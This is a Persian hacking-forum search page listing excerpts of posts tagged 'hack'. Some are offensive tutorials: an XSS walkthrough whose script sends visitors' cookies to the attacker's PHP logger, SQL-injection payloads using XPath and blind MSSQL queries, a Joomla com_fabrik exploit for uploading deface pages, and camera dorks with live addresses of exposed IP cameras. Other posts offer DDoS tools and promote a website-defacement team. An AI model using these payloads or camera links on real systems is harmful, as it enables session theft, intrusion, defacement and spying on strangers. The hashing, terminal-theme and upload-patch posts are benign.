discord icon
سرور دیسکورد گاردایران

جستجو در تالارهای گفتگو

در حال نمایش نتایج برای برچسب های 'hack'.



تنظیمات بیشتر جستجو

  • جستجو بر اساس برچسب

    برچسب ها را با , از یکدیگر جدا نمایید.
  • جستجو بر اساس نویسنده

نوع محتوا


گروه محصول

  • بسته های آموزشی
  • ارتقا به کاربر ویژه

تالارهای گفتگو

  • انجمن گاردایران
    • قوانین و اطلاعیه های سایت
    • اخبار هک و امنیت
    • انتقادات و پیشنهادات
    • بخش خصوصی
    • بخش ویژه - VIP
    • بخش زیر زمینی
  • سوال و جواب های عمومی
    • سوال و جواب های نفوذ به سایت ها و سرورها و روشهای مقابله
    • سوال و جواب های امنیت سیستم های شخصی
    • سوال و جواب های برنامه نویسی
    • سوال و جواب های ابزارهای امنیتی
    • سوال و جواب های شبکه
    • سوال و جواب های مدیریت محتوا و وبلاگ ها
    • سوال و جواب های بخش Trojan , Rat , Keylogger
    • سوال و جواب های سیستم عامل ها
    • سوال و جواب های امنیت ایمیل های شخصی
    • سوال و جواب الکترونیک
    • سوال و جواب های موبایل
    • سوال و جواب های متفرقه
  • انجمن نفوذ و امنیت
    • آموزش های تصویری
    • آموزش های تصویری نفوذ به سیستم های شخصی و روشهای مقابله
    • آموزش های تصویری سایت ها و سرورها و روشهای مقابله
    • آموزشهای تصویری شبکه و روشهای مقابله
    • حملات شبکه و راههای مقابله
    • DOS , DDOS
    • ویروس ها و تروجان ها
    • متاسپلویت Metasploit
    • ابزارهای امنیتی
    • Shell Script
    • آسیب پذیری های وایرلس
    • اکسپلویت
    • باگ های امنیتی
    • امنیت ایمیلهای شخصی
    • تارگت های تمرینی
    • اسکنرها و ابزارهای هکینگ
  • بخش کرک و رمزنگاری
    • ابزار کرک
    • مقالات و آموزشهای کرک
    • مقالات و آموزشهای رمزنگاری
    • ابزارهای رمزنگاری
    • پروکسی لیست
    • پسورد لیست و کمبو لیست
    • کانفیگ
    • اکانت های کرک شده
  • برنامه نویسی
    • برنامه نویسی
    • برنامه نویسی تحت وب
  • بخش موبایل
    • بخش مخصوص موبایل
    • هک موبایل
  • شبکه
  • سیستم عامل
  • الکترونيک و روباتيک
  • گرافيک
  • متفرقه

جستجو در ...

نمایش نتایجی که شامل ...


تاریخ ایجاد

  • شروع

    پایان


آخرین بروزرسانی

  • شروع

    پایان


فیلتر بر اساس تعداد ...

تاریخ عضویت

  • شروع

    پایان


گروه


Website URL


Yahoo


Skype


محل سکونت

80 نتیجه پیدا شد

  1. MR.MSA

    آموزش باگ xss

    با سلام خدمت شما دوستان عزیز یکی از دوستان آموزش باگ xss رو درخواست داشت که قرار دادم . Cross Site Scripting روش کار :‌ با دستورات javascript شما رو به یه لینک ریدایرکت می کنه و کوکی های کاربران رو به شما میده . خب حالا بریم سراغ کارمون .(فقط روی سایت هایی که باگ xss دارند میشه ) مرحله ۱ :‌ برای مثال یه چت روم هست که پیام میدید شما توش به جای پیام این متن رو ارسال میکنید :‌ <script>alert('Error')</script> اگر زمان واردشدن در صفحه در قالب خطا به شما error رو نمایش داد (به صورت هشدار مثلا) یعنی سایت باگ رو داره . مرحله ۲ : در یک سایت که مال خودتون هست یک فایل به نام xss.php درست کنید و این کد php رو درش قرار دهید : <?php $cookie=$_GET['c']; $fo=fopen('cookie.html','a'); fwrite($fo,'Cookie:'.$cookie.'<br><br><br>---------------------------------------<br><br><br>'); fclose($fo); ?> مرحله ۳ : در قسمت ارسال پیام یک پیام دیگر ارسال کنید دارای این کد javascript : <script>document.location="http://site.com/xss.php?c=" + document.cookie </script> به جای site.com ادرس سایت خودتون رو بدید که فایل xss.php رو درش گذاشتید . مرحله ۴ : وارد این ادرس شوید : http://site.com/cookie.html و زمانی که کاربران اون پیام شما رو می بینند ریدایرکت میشن به این ادرس site.com/xss.php و کوکی های اونا توی فایلی به اسم cookie.html برای شما زخیره می شود . نکات مهم زمان انجام این عمل : ۱- هیچ وقت روی سایت خودتون فایل ها رو نسازید چون اگر یه نفر متوجه بشه از سایتتون شکایت میکنه و.... ۲- روی سایت های ایرانی هیچ وقت انجام ندید . ۳- این باگ در جاهای مختلف سایت می تونه باشه مثل باکس جست و جو و بخش نظرات و... ۴- روش های خیلی زیادی برای استفاده از این باگ وجود دارد . اختصاصی Mr.MSA لایک فراموش نشه ! موق و پیروز باشید .
  2. MSACMS با سلام خدمت تمام دوستان و مدیران عزیز سایت گاردایران در این تاپیک برای شما یک خدماتی رو می خواهم ارائه بدهم نام خدمات msacms هست که سه cms : 1.wordpress 2.drupal 3.joomla رو بالا اوردم تا بتوانید به صورت رایگان با cms ها کار کنید و اسیب پذیری و باگ پرایوت پیدا کنید ، همچنین اسیب پذیری توی در پوسته ها و پلاگین ها و .... این خدمات مثل یک ازمایشگاه می مونه که مثلا : شما میای روی یکی از cms های دلخواه تست اسیب پذیری انجام می دهید و روی پلاگین های ورژن دلخواه و پوسته دلخواه و ... و مثلا یه کسی که خیلی بلد نیست میاد و کار با cms رو یاد میگیره . و هر دوستی اگر خواست درخواست می دهد و یه cms به صورت دلخواه با ورژن دلخواه برای اون نصب می شود . ادرس خدمات MSACMS : MR-MSA.XYZ : username & password یوزرنیم و پسورد cms ها : guardiran اما زمانی که شما یک cms رو انتخاب می کنید یه یوزر و پسورد می خواد که خیلی قوی هست و فقط یک بار باید بزنید .(برای امنیت بالا این کار انجام شده که هر فردی نتواند استفاده کند ) در ورژن ۱ برای دریافت یوزرنیم و پسورد به صورت خصوصی در سرور discord گاردایران و یا در قسمت پیام رسانی گاردایران باید به من پیام می دادید ، اما در ورژن ۱.۲.۰ برای شما یوزر و پسورد رو در فایل ضمیمه قرار دادم . (در تایپک دوم موجود است ) ------------------------------------------------------------------------------------------------------------------------------------------------------------- نکات مهم زمان استفاده از سایت : ۱- پسورد و یوزر cms ها همیشه guardiran هست و نباید تعویض گردد . ۲- هر روز cms ها چک می شود . ۳- هر ۳ روز یک بار در صورت لزوم cms ها ریست می شوند . ۴- فقط تا ۳ فایل و حداکثر ۱۰ مگابایت می تونید اپلود کنید . ۵- برای دریافت رمز عبور حتما باید در انجمن گاردایران ثبت نام کنید . ۶- اگر یک زمان خواستید برای مثال ببینید که می توان در این اپلودر شل اپلود کرد یا نه به جای شل از یک فایل php استفاده کنید . ۷- هیچ زمان شل اپلود نکنید ، چون اکانت شما به صورت خودکار بن می شود و دیگر قابل برگشت نیست (به دلیل شناسایی فایروال ) ۸- هیچ زمان به سایت حملات ddos نزنید چون موفق نمی شوید . ۹ - این cms به صورت مداوم بروز می شود . ------------------------------------------------------------------------------------------------------------------------------------------------------------- امنیت سرور : DDOS در حملات دیداس به شبکه خود دیتاسنتر وارد عمل می شود و آنتی دیداس را فعال می کند در حملات دیداس به سایت ها بخاطر مانیتورینگ لحظه ای که سرور دارد سریعا دسترسی به ایران محدود می شود تا حملات خنثی شود . Firewall در ورژن ۱ سرور دارای فایروال نرم افزاری CSV بود اما در ورژن ۱.۲۰ فایروال cloudflare رو هم اضافه کردیم . Shell سرور دارای انتی شل است و به علاوه فایروال مانع اجرا و استفاده از شل می شود . Backup سایت روزانه بک اپ گیری می شود . ------------------------------------------------------------------------------------------------------------------------------------------------------------- امنیت سایت : سعی کردم روی امنیت سایت کار کنم و سایتی با خدمات خوب و البته امنیت بالا ارائه بدهم و در آینده امنیت بالا تر رفته و سایت بهبود می بخشد. ------------------------------------------------------------------------------------------------------------------------------------------------------------- گزارش باگ : اگر دوستی با باگی در خود سایت مواجه شد و یا دوست داشت مورد امنیتی رو در رابطه با خود سایت گزارش بدهد به صورت خصوصی به من گزارش بده تا رفع بشود . ------------------------------------------------------------------------------------------------------------------------------------------------------------- CMS مورد نظر : اگر دوستی cms خواست تا براش نصب کنم به من پیام خصوصی بدهد . اطلاعات شامل : نوع cms ورژن مورد نظر لینک دانلود ------------------------------------------------------------------------------------------------------------------------------------------------------------- قوانین تاپیک : هر سوال داشتید در بخش سوال و جواب ها ، در غیر این صورت پاسخ داده نمی شود . انتقادات و پیشنهادات خودتون رو به صورت خصوصی به من ارسال کنید . مشکلات و خطا ها رو به صورت خصوصی ارسال کنید . ------------- ------------- ------------- تایید شده توسط مدیران بخش ‌: R3DN4X314 و proxy ------------- ------------- ------------ ورژن 1.0.0 رونمایی می کند : mr-msa.xyz ورژن 1.2.0 رونمایی می کند : mr-msa.xyz ورژن 1.3.0 رونمایی می کند : mr-msa.xyz این خدمات به صورت کامل متعلق به انجمن تیم امنیتی گاردایران بوده و هر گونه کپی برداری ، اسیب رساندن به خدمات و ... تخلف محسوب می شود و پیگرد قانونی دارد .
  3. MR.MSA

    Mr.Hasher Tool

    با سلام خدمت شما دوستان عزیز انجمن تیم امنیتی گاردایران با یک ابزار در خدمتتون هستیم . Mr.Hasher نویسنده نسخه PHP‌: @MR.MSA نویسنده نسخه C# : @HCSH4C39 نحوه استفاده : امروز می خوام یه ابزار رو ارائه بدم که شما یک متن رو میدید بهش و برای شما به انواع هش ها هش میکنه . نسخه : این برنامه در دو نسخه php و c# ارائه می شود که php تحت وب و c# قابلیت اجرایی exe (تحت ویندوز) هست . نوع هش ها : در نسخه php MD5 MD4 MD2 SHA1 SHA224 SHA256 SHA384 SHA512 SHA3-224 SHA3-256 SHA3-384 SHA3-512 RIPEMD-128 RIPEMD-160 RIPEMD-256 RIPEMD-320 FNV132 FNV1A64 FNV164 FNV1A32 HAVAL-128,3 HAVAL-160,3 HAVAL-192,3 HAVAL-224,3 HAVAL-256,3 HAVAL-128,4 HAVAL-160,4 HAVAL-192,4 HAVAL-224,4 HAVAL-256,4 HAVAL-128,5 HAVAL-160,5 HAVAL-192,5 HAVAL-224,5 HAVAL-256,5 TIGER-128,3 TIGER-160,3 TIGER-192,3 TIGER-128,4 TIGER-160,4 TIGER-192,4 ADLER-32 CONVERTUUENCODE GOST JOAAT CRC32C CRC32B CRC32 SNEFRU WHIRLPOOL BASE64 HEX ASCII در نسخه C# MD5 SHA 160 SHA 256 SHA 384 SHA 512 RIPEMD 160 لینک های مهم : 1- GitHub 2- Demo Online موفق و پیروز باشید .
  4. Mr_Zero

    Crack

    ••.•´¯`•.•• 🎀 به نام خدا 🎀 ••.•`¯´•.•• با سلام خدمت دوستان عزیز تیم انجمن گاردایران در این پست چند ابزار مخصوص کرک قرار دادم که مخصوص ویندوز هستش امیدوارم خوشتون بیاد با تشکر 🍫💣 ᵐℝ_𝐙𝐞𝐑𝓞 🎃♬Mr_Zero.zip لیستی از انواع کرک اکانت و هش ----------->>>>
  5. Mr_Zero

    DDos ATTack

    سلام خدمت دوستان عزیز در این پست چند برنامه DDoS قرار دادم و یک فایل سورس که میتونید خیلی راحت کامپایل کنید و نحوه ی کد نویسی رو ببینید که خودتون این نوع حملات رو بنویسید با تشکر💖 Mr_Zero Desktop.zip source code.zip
  6. با سلام خدمت تمامی اساتید انجمن تیم امنیتی گاردایران . این تاپیک برای ارائه ابزار های نوشته شده توسط کاربران دیفیسر گاردایران در سرور دیسکورد هست . که بیشتر ابزار ها رو خودم تاپیکش رو می زارم مگر اینکه نویسنده ابزار موافق نباشد . اعضای دیفیسر (غیر رسمی ) : 1- @proxy 2- @MR.MSA 3- @sign4l 4-@mbdev12 5- @HCSH4C39 6- @mmj-sys مشارکت در تیم دیفیس : شما با هر سطح علمی در زمینه هک ، کم(صفر) ، متوسط و حرفه ای می توانید در تیم دیفیس شرکت کنید . برای مشارکت و آموزش و شروع به دیفیس به سرور دیسکورد گاردایران مراجعه کنید . لینک های مهم : سرور دیسکورد گاردایران دیفیسر ها سایت های هک شده توسط تیم امنیتی گاردایران موفق و پیروز باشید .
  7. با سلام خدمت دوستان عزیز گاردایران . من توی کانال های مختلف هک ، لینوکس ، برنامه نویسی .. هستم و بعضی ها رو می بینم که تم ترمینالشون رو عوض می کنن که خیلی جذابیت می ده به کار ما هکر ها . پس منم رفتم نحوه تغییر تم رو یاد گرفتم ، توی انجمن که گشتم چنین پستی نبود ، پس گفتم اموزشش رو بزارم . خب ابتدا دستورات زیر به ترتیب می زنید : > sudo apt install figlet > sudo apt install lolcat > sudo apt install gem > sudo apt install ruby Figlet : برای اینکه بتونیم یک متن رو به صورت بزرگ برای مثال Mr.MSA رو زمانی که ترمینال باز می شود نمایش دهیم از figlet استفاده می کنیم . که فونت های مختلف در اینجا موجود است. lolcat : برای اینکه به متن خودمون رو به صورت رندم رنگ هایی رو بدیم از lolcat استفاده می کنیم . Gem & Ruby : پیشنیاز های lolcat . حالا برای اینکه بتونیم از lolcat استفاده کنیم از این دستور استفاده می کنیم : gem install lolcat و برای اینکه سیستم ابزار ها رو بشناسه از این دستور استفاده کنید : sudo apt update ---------------------------------------------------------------------------------------------------------------- خب حالا شما با دستور زیر می تونید متن خودتون رو بصورت بنر و رنگ های رندم نمایش دهید : figlet MR.MSA | lolcat خب حالا می خواهیم برای همیشه زمانی که ترمینال رو باز می کنیم این متن رو نمایش بده . ابتدا oh my zsh رو نصب کنید : نصب با curl : sh -c "$(curl -fsSL https://raw.github.com/ohmyzsh/ohmyzsh/master/tools/install.sh)" نصب با wget : sh -c "$(wget https://raw.github.com/ohmyzsh/ohmyzsh/master/tools/install.sh -O -)" نصب با github : https://github.com/ohmyzsh/ohmyzsh.git نصب تم در zsh : بعد از نصب zsh شما ابتدا این دستور رو می زنید : cd ~ بعد این دستور برای ادیت کردن فایل .zshrc vim .zshrc در اون فایل دنبال این کلمه بگردید : ZSH_THEME="robbyrussell" اون کلمه ای که بین " است نام تم zsh هست که به صورت پیش فرض robbyrussell هست . برای تغییر دادنش شما باید به این ادرس بروید : https://github.com/ohmyzsh/ohmyzsh/wiki/Themes و بر اساس عکس هایی که گذاشته شده نام تم رو انتخاب کنید و در این قسمت قرار دهید : ZSH_THEME=" نام تم مورد نظر " نمایش بنر دلخواه با رنگ رندم : برای اینکار در همان فایل .zshrc در خط اخر این دستور رو بزاید : figlet 'Mr.MSa' | lolcat و به جای Mr.MSA متن مورد نظر خودتون رو بنویسید . حالا این کلید ها رو به ترتیب روی کیبورد برای خارج شدن از ادیتور vim و سیو کردنش فشار دهید : 1) esc 2) : 3) w 4) q حالا در قسمت edit profile ترمینال در قسمت کامند شل پیش فرض که bash هست رو به zsh تغییر بدید یعنی : /bin/bash به این تغییر می کنه : /bin/zsh حالا یک بار از ترمینال خارج بشید و دوباره ترمینال رو باز کنید و مشاهده می کنید که ترمینال شما نسبت به روز اول زیبا تر شده است . و می توانید با دستورات zsh چیز های دیگه هم بزارید یا حتی همین دستور رو چند بار دیگه بنویسید با متن های مختلف . این یه فایل PDF آموزشی است که دوست عزیز دیفیسرمون HCSH4C39 نوشته که می تونید به همراه این تاپیک از این آموزش هم استفاده کنید : HCSH4C39.pdf موفق و پیروز باشید .
  8. با سلام خدمت دوستان عزیز گارد ایران در این تاپیک برای شما تارگت های مختلف sql injection رو قرار می دم که به صورت ویدئویی هست و ضبط کردم تا بتوانید تمرین کنید لذت ببرید . 😁 لینک کانال برای مشاهده ویدئو ها : https://www.youtube.com/channel/UCLkbfmELZBnOvh1dwK1hXZw چند نکته مهم :‌ لطفا اگر دوستی قصد ارسال پست دارد فقط به صورت ویدئویی باشد . تارگت در مورد sql injection باشد و بهتره تارگت با نکته ارائه شود . اسپم ارسال نکنید و اگر سوالی داشتید در بخش سوال و جواب ها بپرسید . و اگر پیشنهاد و یا چیزه دیگه ای بود به صورت خصوصی پیام دهید . (در این جا اسپم ارسال نشود ) تشکر 🙏 .
  9. در این تاپیک دورک دوربین های مداربسه رو قرار دادم براتون و یه سری دوربین مداربسته که می توانید راحت تماشا کنید . inurl:"view.shtml" "Network Camera" "Camera Live Image" inurl:"guestimage.html" inurl:/ViewerFrame? intitle:"Network Camera NetworkCamera" intitle:NetworkCamera intext:"Pan / Tilt" inurl:ViewerFrame inurl:/live.htm intext:"M-JPEG"|"System Log"|"Camera-1"|"View Control" inurl:"MultiCameraFrame?Mode=Motion" intitle:"IP CAMERA Viewer" intext:"setting | Client setting" allintitle: Axis 2.10 OR 2.12 OR 2.30 OR 2.31 OR 2.32 OR 2.33 OR 2.34 OR 2.40 OR 2.42 OR 2.43 "Network Camera " Display Cameras intitle:"Express6 Live Image" intitle:"Orite IC301" camera linksys inurl:main.cgi دورک های زیادی در سایت های مختلف هست ولی این ها رو دونه دونه چک کردم تا بتوانید راحت تر استفاده کنید . این دوربین های مداربسته رو از همون دورک ها بدست اوردم و همین الان لینک ها چک شده . http://corp.glaztech.com:83/m/ViewerFrame?Mode=Motion&Resolution=640x480&Quality=Standard&Interval=30&Size=STD&PresetOperation=Move&Language=4 http://82.62.121.150/cgi-bin/guestimage.html http://75.145.165.113:86/ViewerFrame?Mode=Motion&Language=4 http://wwww.kelhess.com:82/ViewerFrame?Mode=Refresh&Language=4 http://130.191.35.82/live.htm http://184.185.210.241/ViewerFrame?Mode=Motion&Language=0 http://129.2.122.140/view/index.shtml http://99.43.4.246/main.cgi?next_file=main2.htm "منبع : exploit-db.com " امیدوارم لذت برده باشید ، دونه دونه لینک چک کردن سخت هست تشکر فراموش نشه لطفا . 😄 موفق و پیروز باشید .
  10. MR.MSA

    آموزش ابزار john

    با سلام خدمت کاربران و مدیران عزیز در این تاپیک برای شما یک ویدئو آماده کردم که ابزار john رو آموزش دادم . دو تا از حالت های پر کاربرد رو آموزش دادم امیدوارم اذت ببرید . از این ابزار می توانید برای گسترش پسورد لیست و کرک هش و ... استفاده کنید . امیدوارم لذت برده باشید و اگه لایک کنید ابزار های بیشتری رو قرار می دم . پیروز و سربلند باشید 😆.
  11. با سلام خدمت شما دوستان عزیز در این تاپیک قصد دارم ابزار Hammer که برای حملات dos و ddos استفاده می شود رو به شما آموزش بدهم . برای شما یک ویدئو آموزشی آماده کردم : در فایل ضمیمه برای شما آموزش تصویری رو آماده کردم تا بتوانید بهتر این ابزار رو یاد بگیرید . فرمت : PDF به شما هم آموزش ویدئویی رو پیشنهاد می کنم و هم آموزش تصویری ، پیروز باشید 😁 Hammer Image.pdf
  12. MR.MSA

    برسی مرورگرها

    با سلام خدمت دوستان عزیز در این تاپیک قصد دارم که مرورگر ها رو باهم برسی کنیم . این روز ها شاید بعضی هکر ها بین چند مرورگر اختلاف نظر داشته باشند برای همین باهم اینجا این ها رو برسی میکنیم . ما می خواهیم مرورگرهای کروم ، فایرفاکس ،‌ تور و اپرا رو برسی کنیم که جز قوی ترین مرورگر ها هستند و بین ما هکر ها محبوبیت دارد ، خب بریم برسی رو شروع کنیم . اولین مرورگر یعنی Google Chrome ‌: همانطور که می دانید کروم متعلق به شرکت گوگل هست و گوگل یک موتور جستوجو قوی هست و بیشتر هکر ها از google استفاده می کنند به خاطر دورک ، امنیت ، سرعت و.... گوگل كروم به عنوان يكی از پركاربردترين مرورگرها در سراسر جهان شناخته می‌شود و بین خیلی ها محبوبیت دارد . از جمله ویژگی های کروم می توانیم اشاره کنیم به : سازگاری خوب با گوگل و نسخه های مختلف سرعت خوب و سازگاری با سیستم عامل های Windows، macOS، Linux، Android، iOS افزونه های بسیار زیاد و نرم افزار های افزودنی که داره جذابش می کنه (اما بعضی افزونه ها خوب کار نمی کند ) توضیحات : Chrome 79 به هیچ وجه مرورگر بدی نیست و پشتیبانی و همگام سازی متقابل پلتفرم ، ویژگی های خودکار کامل و برخی ابزار های خوب عالی برای توسعه دهندگان وب است . این می تواند به شما هشدار دهد اگر ایمیل شما به خطر بیفتد، از جستجوی DNS مطمئن برای ارائه دهندگان سازگار برخوردار است (خود DNS عمومی Google یکی از آنهاست) و بسیاری از محتوای مخلوط خطرناک مانند اسکریپت ها و تصاویر را در اتصالات غیرقابل اطمینان مسدود می کند. همچنین WebXR API را برای AR و VR فعال می کند. و .... نکات مثبت مرورگر کروم : حالت تاریک Chrome یک نکته مثبت است که می توانم بهش اشاره کنم . گوگل کروم به طور مداوم در لیست امن ترین مرورگرها قرار دارد و همانطور که گفتم و خبر دارید امنیت بسیار بالایی دارد. در تست های هک عملکرد خوبی دارد و بروزرسانی های مداوم و ماهیانه ای که داره شما رو بروز قرار می دهد. در مسابقات سالانه هک کردن Pwn2Own در چندین نوبت (و همچنین جوایز امنیتی دیگر) بخش “امن ترین مرورگر” را به دست آورد. نکات بدی که داره : عمده موارد مربوط به حریم خصوصی ، برنامه های افزودنی مرورگر می تواند باعث ایجاد مشکلات امنیتی و ... شود . میرویم سراغ مرورگر دوم یعنی Firefox : مرورگر فایر فاکس یک مرورگر محبوب در سرار جهان است که بیشتر خود ما ایرانی ها از این مرورگر استفاده می کند ، من هکر های زیادی رو تا به حال دیدم که از فایرفاکس استفاده می کنند ، فایرفاکس رقیب کروم هست و توی امنیت خیلی خوب خودش رو ثابت کرده است . از جمله ویژگی ها می توانیم اشاره کنیم به سرعت بالا مرورگر افزونه ها و ابزار های افزودنی افزونه های مورد استفاده در هک مثل hackbar و live http header (در کروم هم موجود هستند) نسخه های مختلف مرورگر ، برای توسعه دهندگان وب و درميان توسعه‌هندگان فايرفاكس احتمالا محبوب‌ترين مرورگر جهان است. با استفاده از این مرورگر میتوانید به یک خطایاب جاوا اسکریپت دست پیدا کنید. به علاوه ، با نسخه توسعه دهنده فايرفاكس ، شما به موتور CSS نسل بعد (نوشته شده در RUST) دسترسی پيدا خواهيد كرد ، يک سيستم CSS غيرفعال كه اعلان‌هايی كه بر روی صفحه اثر ندارد را غيرفعال می‌كند، و مواردی بيش از اين هم ارائه می‌كند. همچنين یک هاست “Firefox DevTool” برای دسترسی بهتر وجود دارد . پیشنهاد می کنم که اگر از مرورگر فایرفاکس یا کروم استفاده می کنید برای امنیت بالاتر در مرورگر خود از افزونه LastPass برای ذخیره پسورد ها تون استفاده کنید . سعی کردم بیشتر توضیحات رو بدم و امیدوارم لذت برده باشید . شاد باشید 😅
  13. MR.MSA

    جلوگیری از باگ RFU

    با سلام خدمت کاربران و مدیران عزیز گارد ایران در این پست قصد دارم به شما نحوه پچ باگ RFU بدم . RFU : Remote File Upload یک توضیح مختصر : هنگام اپلود یک فایل در سرور این اسیب پذیری به وجود می اید که هکر فایل مخرب خودش رو در سرور آپلود می کند (shell) به صورت کلی این اسیب پذیری بسیار خطر ناک است و باعث می شود که هکر دسترسی کامل به سایت بگیرد ولی حالت های دیگری هم وجود دارد که خطر این باگ کمتر می شود مثلا هکر نمی تواند فایل php خودش که شل است رو آپلود کنه به جای آن فایل html خودش که دیفیس پیج است رو آپلود می کنه یه کمی توضیح طولانی شد خب حالا میریم سراغ جلو گیری از باگ RFU در کد نویسی اولین قدم باید فایل ها در یک جای مشخص و خاص باشد می توانید از این دستور استفاده کنید : move_uploaded_file($_FILES['upload']['tmp_name'],"Guardiran/{$_FILES['upload']['name']}"); الان فایل های اپلودی در فولدری به نام Guardiran قرار می گیرند . حالا برای اینکه فایل های php قابل آپلود نباشند : if(end(explode('.',$_FILES['upload']['name'])) !== 'php'){ move_uploaded_file($_FILES['upload']['tmp_name'],"Guardiran/{$_FILES['upload']['name']}"); }else{ } تا الان آپلودر ما کمی وضعیتش بهتر شده بعضی از سایت ها از این فیلترینگ استفاده می کنند ولی امنیت بسیار پایینی دارد چون زبان php به حروف بزرگ و کوچک حساس است یعنی ما گفتیم با در آخر نام ... php نباشد اما برای مثال هکر با این نام اپلود می کند b374k.PHP که هر دو فرمت php هستند اما از نظر حروف کوچک و بزرگ باهم فرق دارند پس کد های خودمون رو تغییر می دهیم . به این صورت : if(end(explode('.',$_FILES['upload']['name'])) == 'jpg'){ move_uploaded_file($_FILES['upload']['tmp_name'],"Guardiran/{$_FILES['upload']['name']}"); }else{ } الان یک اپلودر با امنیت خوب داریم ولی هنوز با بایپس ها و متد و... امکان دور زدن وجود دارد پس امنیت رو بالا تر می بریم تا کار هکر سخت تر شود . کاری می کنیم که هکر به راحتی فایل خودش رو پیدا نکنه و از تابع rand استفاده می کنیم و کد ها رو به این صورت می نویسیم :‌ if(end(explode('.',$_FILES['upload']['name'])) == 'jpg'){ $ch = rand(); move_uploaded_file($_FILES['upload']['tmp_name'],"Guardiran/{$ch}.jpg"); }else{ } می توانید بعد از else (در غیر این صورت ) خطای خود را با html و css طراحی کنید . چند راه پیشنهادی جهت رفع بهتر باگ RFU : بهتر است که از یک سرور اختصاصی استفاده کنید و فایل های اپلودی خودتون رو در یک سرور دیگر آپلود کنید . دایرکتوری فایل های اپلود با دایرکتری فایل های اصلی متفاوت باشد . امیدوارم از این پست لذت برده باشید . Download Uploader.zip
  14. با سلام خدمت دوستان عزیز در این تاپیک قصد دارم به شما متد Xpath رو آموزش بدهم . Xpath injection کاربرد : 1. مثلا زمانی که در دستور +order+by+99999-- عدد 1 هم که می زنید صفحه لود نمی شود باید از این متد استفاده کنید . 2. زمانی که به ارورnumber of column the diffrent باید از این متد استفاده کنید . 3. زمانی که union…. را می زنید و با وجود اینکه تعداد درست است ولی به شما ستون اسیب پذیر را نشان ندهد . 4. و..... -------------- -------------- -------------- روش استفاده از متد xpath اول از بایپس هایی که بلدید استفاده کنید مثل : منفی پشت عدد ، source ، بزرگ کردن حروف و .... اگر مشکل حل نشد به سراغ این متد میاید . آموزش متد xpath : بدست اوردن ورژن : …..?sa=12+and+extractvalue(rand(),concat(0x7e,version()))-- 0x7e به معنای علامت (~) است . version() به معنای ورژن سایت است. در آموزش بعدی به شما بیرون کشیدن تیبل ها را آموزش می دهم .
  15. با سلام خدمت شما کاربران و مدیران عزیز گارد ایران در این پست می خواهم به شما متد قدرتمند blind را در سایت های asp آموزش بدهم . Blind to asp تست اسیب پذیری : and 1=1 باید لود شود و and 1=2 نباید لود شود . نام دیتابیس با دستور : and isnull (ascii(substring (cast((select lower(db_name(0)))as varchar(8000)),1,1)),0)>97 97 که با کد ascii می شود a و داریم می گوییم حرف اول نام دیتابیس a است و اگر صفحه لود شد یعنی حرف اول a نیست و 97 مثلا می شود 98 یعنی b و به همین صورت پیش می روید یکی یکی تا اینکه به یک عدد برسید که صفحه لود نشود و ان اولین حرف نام دیتابیس هست و بیشتر کار ها هم مثل blind در mysql است و برای مثلا انجام دادن همین کار برای حرف دوم نام دیتابیس ان عدد را که در دستور بالا قرمز کردیم را مثلا کنید ۲ و برای حرف ۳ بکنید ۳ و به همین صورت . ببخشید که یک کمی طولانی شد . --------- --------- --------- --------- --------- --------- --------- --------- --------- --------- نکته : اگر یک زمان نتیجه این طور شد : (مثلا برای حرف ۲‌) 99 ‌< true 100 > true 99 = false یعنی بیشتر از ۹۹ و کمتر از ۱۰۰ و ۹۹ هم نیست پس بین این ها ۹۹.۵ است که تخمین زده می شود به ۱۰۰ به این صورت : and isnull (ascii(substring (cast((select lower(db_name(0)))as varchar(8000)),1,1)),0)>99 = load and isnull (ascii(substring (cast((select lower(db_name(0)))as varchar(8000)),1,1)),0)>100 = no load and isnull (ascii(substring (cast((select lower(db_name(0)))as varchar(8000)),1,1)),0)=99 = no load --------- --------- --------- --------- --------- --------- --------- --------- --------- --------- بیرون کشیدن نام دیتابیس های بعدی : and isnull (ascii(substring(cast((select lower (db_name(0))) as varcher (8000)),1,1)),0)>97 برای اینکار ان عدد 0 را که آبی هست یکی یکی اضافه کنید تا یکی یکی بروید به دیتابیس بعد . مثال : and isnull (ascii(substring(cast((select lower (db_name(1))) as varcher (8000)),6,1)),0)>97 and isnull (ascii(substring(cast((select lower (db_name(2))) as varcher (8000)),4,1)),0)>98 and isnull (ascii(substring(cast((select lower (db_name(3))) as varcher (8000)),3,1)),0)>102 and isnull (ascii(substring(cast((select lower (db_name(4))) as varcher (8000)),1,1)),0)>107 --------- --------- --------- --------- --------- --------- --------- --------- --------- --------- چون متد پیچیده ای هست و برای اینکه پست طولانی نشود در آموزش بعد به شما بیرون کشیدن تیبل ها را آموزش می دهم .
  16. MR.MSA

    متد Fabrik

    Fabrik موارد قابل استفاده : در سایت های جوملا قابل استفاده است . یکی از زیر مجموعه های RFI در سایت هایی که این ادرس را دارند (دورک): index.php?option=com_fabrik ....و Dork : inurl:index.php?option=com_fabrik مراحل متد :‌ ۱ ) دورک را بزنید و یک سایت را انتخاب کنید و اگر صفحه بدون خطای ۴۰۴ ، ۴۰۱ و ۵۰۰ لود شد یعنی به احتمال زیاد این باگ را دارد . (مطمئن شوید که سایت با cms جوملا هست ) ۲) این اکسپلویت را به ادرس سایت اضافه کنید . Exploit : index.php?option=com_fabrik&c=import&filetype=csv&tables=1 ۳) سپس فایل خود را آپلود کنید .( اون فایل می توانید دیفیس پیج شما باشد . ) ۴) این ادرس را به سایت اضافه و به جای (FILE_NAME) نام فایل خودتان را بنویسید . /media/(FILE_NAME)
  17. در کالی لینوکس ۲۰۲۰ دستور ifconfig جواب نمی دهد (در بعضی مواقع) که حتی با چند بار نصب کردن دوباره ی کالی باز هم مشکل بر طرف نمی شود . در این تاپیک قصد دارم یک راه حل برای رفع این موضوع را آموزش دهم . ابتدا دستور whereis ifconfg رو میزنید تا مطمئن شوید که ifconfig نصب شده و ادرسی که به شما میدهد را کپی کنید. احتمالا این آدرس هست : usr/sbin/ifconfig و بعد یک cd بزنید و دستور زیر را وارد کنید : echo $PATH خب الان متغیر محیطی path را فراخوانی کردید ، اگر ادرس : usr/sbin در آن وجود نداشت شما باید آن را اضافه کنید . ابتدا باید وارد فایل etc/environment شوید ، با دستور : sudo vim etc/environment می توانید با ادیتور nano هم بروید ولی من در اینجا با vim رفتم . (این فایل متغیر های محیطی رو ست می کند) چون می خواهیم با دسترسی روت (sudo) برویم احتمال دارد رمز کالی رو بخواهد رمز رو بزنید و بعد این دستور رو در فایل بنویسید خارج شوید . export PATH=$PATH:usr/sbin ( حالا اگر دستور دیگری هم بود ادرسش رو اضافه می کنید . ) و حالا برای کامپایل کردن فایلمون این دستور رو میزنیم : source etc/environment و حالا می بینید که دستور ifconfig 